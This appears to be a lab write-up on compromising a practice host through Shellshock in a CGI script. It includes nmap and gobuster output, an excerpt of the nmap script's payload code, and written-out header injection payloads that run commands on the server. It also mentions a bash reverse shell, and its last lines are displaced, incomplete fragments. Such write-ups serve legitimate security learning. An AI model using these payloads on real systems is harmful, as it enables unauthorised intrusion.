Vulnerable Exploit: Misconfigured restricted access and vulnerable to Shellshock
System Vulnerable: 10.10.10.56
Vulnerability Explanation: The machine is misconfigured restricted access to file and it is vulnerable to shellshock which could allow us to gain initial foothold on the machine.
Privilege Escalation Vulnerability: Misconfigure on perl script that allow normal user to run with NOPASSWD require.
Vulnerability Fix: Upgrade or apply patched to the system and restrict access to all files and directory for unauthorized user.
Severity: High
Step to Compromise the Host:
Reconnaissance
└─$ nmap -p- -sC -sV -T4 10.10.10.56 -Pn
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-31 12:11 EDT
Nmap scan report for 10.10.10.56
Host is up (0.043s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
2222/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
| 256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_ 256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Enumeration
Port 80 Apache/2.4.18 (ubuntu)
By browsing the webpage, we just found an image. Viewing source code also nothing is interest.
By finding hidden directory with gobuster as normal, we found only /server-status. It's suppose to have other file or directory existing.
└─$ gobuster dir -u http://10.10.10.56 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.56
[+] Method: GET
[+] Threads: 50
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2021/11/01 11:17:11 Starting gobuster in directory enumeration mode
===============================================================
/server-status (Status: 403) [Size: 299]
===============================================================
2021/11/01 11:20:25 Finished
===============================================================
Let try discover hidden directory with other tool as dirb. With dirb, we found /cgi-bin/ and index.html.
Let further enumerating on the web browser. By browsing /cgi-bin/ and /cgi-bin to see the different.
As we can see /cgi-bin/ it returns status code 403 (Forbidden) whereas /cgi-bin it returns 404 (Not Found). It seems like if we didn't add / at the end, it doesn't work.
Let try discover hidden directory again with gobuster with the options -f to add / at the end. As we are now can see the directory /cgi-bin/.
To view the content easily, we can intercept traffic through burp,
Notice on server response, the Content-Type header is text/x-sh and the below script is trying to add Content-Type header text/plain but it's after the empty line, so it's in the body.
└─$ nmap -p80 --script http-shellshock --script-args uri=/cgi-bin/user.sh 10.10.10.56
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-01 12:30 EDT
Nmap scan report for 10.10.10.56
Host is up (0.044s latency).
PORT STATE SERVICE
80/tcp open http
| http-shellshock:
| VULNERABLE:
| HTTP Shellshock vulnerability
| State: VULNERABLE (Exploitable)
| IDs: CVE:CVE-2014-6271
| This web application might be affected by the vulnerability known
| as Shellshock. It seems the server is executing commands injected
| via malicious HTTP headers.
|
| Disclosure date: 2014-09-24
| References:
| http://www.openwall.com/lists/oss-security/2014/09/24/10
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169
| http://seclists.org/oss-sec/2014/q3/685
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271
Seem like this application is vulnerable to shellshock.
Shellshock Exploitation
Viewing nmap script, we found that it's going to inject command to verify.
if not cmd then
local rnd1 = rand.random_alpha(7)
local rnd2 = rand.random_alpha(7)
rnd = rnd1 .. rnd2
cmd = ("echo; echo -n %s; echo %s"):format(rnd1, rnd2)
end
cmd = "() { :;}; " .. cmd
-- Plant the payload in the HTTP headers
local options = {header={}}
options["no_cache"] = true
if custom_header == nil then
stdnse.debug1("Sending '%s' in HTTP headers:User-Agent,Cookie and Referer", cmd)
options["header"]["User-Agent"] = cmd
options["header"]["Referer"] = cmd
options["header"]["Cookie"] = cmd
else
stdnse.debug1("Sending '%s' in HTTP header '%s'", cmd, custom_header)
options["header"][custom_header] = cmd
end
Let start manual testing and inject command into User-Agent. We can see, it seem likes include 1 more space on the body.
Accept: () { :;}; echo
By adding ls to list current directory but it doesn't display anything.
Accept: () { :;}; echo; ls
But if we include the complete path, it's going to execute and display the current directory.
Accept: () { :;}; echo; /bin/ls
Let start inject bash reverse shell command on User-Agent and start netcat listener on 4444.
defines a way for a web server to interact with external content-generating programs, which are often referred to as CGI programs or CGI scripts. The script extension use pl (perl) and cgi. For this box is Ubuntu let check extension sh (shell).
Let start checking, if this application is vulnerable to or not. Using nmap script to verify.
The best place for me to check for privilege escalation is .
